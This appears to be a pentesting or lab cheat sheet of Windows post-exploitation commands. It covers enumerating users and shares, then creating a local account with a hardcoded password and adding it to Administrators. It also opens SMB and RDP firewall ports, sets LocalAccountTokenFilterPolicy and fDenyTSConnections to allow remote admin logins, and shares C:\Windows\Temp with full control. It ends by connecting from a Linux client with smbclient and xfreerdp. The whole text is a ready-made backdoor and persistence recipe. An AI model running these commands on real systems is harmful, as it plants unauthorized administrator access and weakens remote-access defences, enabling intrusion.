==============================================================================
[+] List users
==============================================================================
net users
net share
NET ACCOUNTS
NET ACCOUNTS /DOMAIN
net localgroup
==============================================================================
[+] Create user
==============================================================================
net user usuario 123456789a* /add
net localgroup Administrators usuario /add
==============================================================================
[+] Enable SMB
==============================================================================
netsh advfirewall firewall add rule name="SMB Port In" protocol=TCP dir=in localport=445 action=allow
netsh advfirewall firewall add rule name="SMB Port Out" protocol=TCP dir=out localport=445 action=allow
cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
net share compartido=C:\Windows\Temp /GRANT:Administrators,FULL
# Connect Linux client
smbclient '\\10.10.10.81\compartido' -U  usuario

==============================================================================
[+] Enable RDP
==============================================================================
netsh advfirewall firewall add rule name="RDP Port In" protocol=TCP dir=in localport=3389 action=allow
netsh advfirewall firewall add rule name="RDP Port Out" protocol=TCP dir=out localport=3389 action=allow
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net localgroup "Remote Desktop Users" usuario1 /add
# Connect Linux client
xfreerdp /u:usuario1 /d:WORKGROUP /p:123456789a* /v:10.10.10.81 
